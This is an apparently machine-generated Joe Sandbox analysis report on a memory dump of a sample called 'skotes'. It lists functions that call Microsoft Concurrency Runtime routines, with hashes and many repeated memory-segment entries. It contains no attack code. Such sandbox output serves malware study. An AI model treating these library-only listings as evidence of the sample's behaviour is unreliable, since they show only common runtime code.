                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                    • String ID: pEvents
                                                                                                                                                                    • API String ID: 2141394445-2498624650
                                                                                                                                                                    • Opcode ID: 7fc1a4cdc92c0cea99fc5fe65fafc958a6d49da1e754ff6858ca939d89e8b610
                                                                                                                                                                    • Instruction ID: 50afa3b3b05a26c0084105c4b51d6fc9c63f345d4fc464ff8c33acbe7b6f47cd
                                                                                                                                                                    • Opcode Fuzzy Hash: 7fc1a4cdc92c0cea99fc5fe65fafc958a6d49da1e754ff6858ca939d89e8b610
                                                                                                                                                                    • Instruction Fuzzy Hash: D5818B31D01A29CBCF24DBE4E985BEEB7B6AF15310F144439E401A7382DB75AA45CFA1
                                                                                                                                                                    Function 006426D1 Relevance: 22.7, APIs: 15, Instructions: 231COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 006426E3
                                                                                                                                                                      • Part of subcall function 006424E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00642504
                                                                                                                                                                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 00642704
                                                                                                                                                                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 00642711
                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 0064275F
                                                                                                                                                                    • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 006427E6
                                                                                                                                                                    • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 006427F9
                                                                                                                                                                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 00642846
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::$Search$Work$Context::$Base::Scheduler$CachePriorityQuick$AcquireCheckItemItem::ListLocal_NextObjectPeriodicRunnablesScanSlot
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2530155754-0
                                                                                                                                                                    • Opcode ID: b7a4ee63b569ed2951d9a535e87927b314ace9305a2d9eb1f09c24f1f381b75a
                                                                                                                                                                    • Instruction ID: eb536bab0e343a50e409e5d87828ea5de23bae24cf1badc977c20da5d7cbdc09
                                                                                                                                                                    • Opcode Fuzzy Hash: b7a4ee63b569ed2951d9a535e87927b314ace9305a2d9eb1f09c24f1f381b75a
                                                                                                                                                                    • Instruction Fuzzy Hash: 5E817B3490024AABDF169F54C9A1BFE7BB3AF45308F640098FC416B352C7728D5ADBA1
                                                                                                                                                                    Function 00642970 Relevance: 16.7, APIs: 11, Instructions: 222COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 00642982
                                                                                                                                                                      • Part of subcall function 006424E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00642504
                                                                                                                                                                    • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 006429A3
                                                                                                                                                                    • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 006429B0
                                                                                                                                                                    • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 006429FE
                                                                                                                                                                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Unrealized.LIBCONCRT ref: 00642AA6
                                                                                                                                                                    • Concurrency::details::WorkSearchContext::SearchCacheLocal_Realized.LIBCONCRT ref: 00642AD8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::Search$Work$Context::$Base::CacheLocal_PriorityScheduler$CheckItemItem::ListNextObjectPeriodicRealizedScanUnrealized
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1256429809-0
                                                                                                                                                                    • Opcode ID: 3e396f5e278a0d0dd2c15928e93a5cac9ccd3dea0fc80b8afabb882e7f46afd6
                                                                                                                                                                    • Instruction ID: 8a9cd1c0f33d5af4aac21d08023ddb52597427d973cc54bb2a8859de645b9e32
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e396f5e278a0d0dd2c15928e93a5cac9ccd3dea0fc80b8afabb882e7f46afd6
                                                                                                                                                                    • Instruction Fuzzy Hash: 8371673090024AABDF15DF54C9A1AFEBBA3EF45308F644098FC416B392CB729D56DB61
                                                                                                                                                                    Function 00632832 Relevance: 15.2, APIs: 10, Instructions: 223COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00632876
                                                                                                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 006328DF
                                                                                                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 00632913
                                                                                                                                                                      • Part of subcall function 006307ED: Concurrency::details::ResourceManager::AffinityRestriction::ApplyAffinityLimits.LIBCMT ref: 0063080D
                                                                                                                                                                    • Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00632993
                                                                                                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 006329DB
                                                                                                                                                                      • Part of subcall function 006307C2: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 006307DE
                                                                                                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 006329EF
                                                                                                                                                                    • Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00632A00
                                                                                                                                                                    • Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 00632A4D
                                                                                                                                                                    • Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00632A7E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Concurrency::details::Manager::Resource$Affinity$Apply$Restrictions$InformationTopology$Restriction::$CleanupFindGroupLimits
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1321587334-0
                                                                                                                                                                    • Opcode ID: 03e47dbcfde6cd38cebc4caa5efa022ae5e82da068214172b988583d4338fa0d
                                                                                                                                                                    • Instruction ID: 393cfca8fb1e72b1144497ab991289666d37ee4427f27f5ad4fa8ab4b4c3d446
                                                                                                                                                                    • Opcode Fuzzy Hash: 03e47dbcfde6cd38cebc4caa5efa022ae5e82da068214172b988583d4338fa0d
                                                                                                                                                                    • Instruction Fuzzy Hash: C181AA31A0061B9BDB18DFA9D8B06BDB7B3BB48700F2450ADD44AE7391D770A985CBD4
                                                                                                                                                                    Function 006369DA Relevance: 15.1, APIs: 10, Instructions: 144COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00636A1F
                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00636A51
                                                                                                                                                                    • List.LIBCONCRT ref: 00636A8C
                                                                                                                                                                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00636A9D
                                                                                                                                                                    • Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00636AB9
                                                                                                                                                                    • List.LIBCONCRT ref: 00636AF4
                                                                                                                                                                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00636B05
                                                                                                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00636B20
                                                                                                                                                                    • List.LIBCONCRT ref: 00636B5B
                                                                                                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00636B68
                                                                                                                                                                      • Part of subcall function 00635EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00635EF7
                                                                                                                                                                      • Part of subcall function 00635EDF: Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00635F09
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
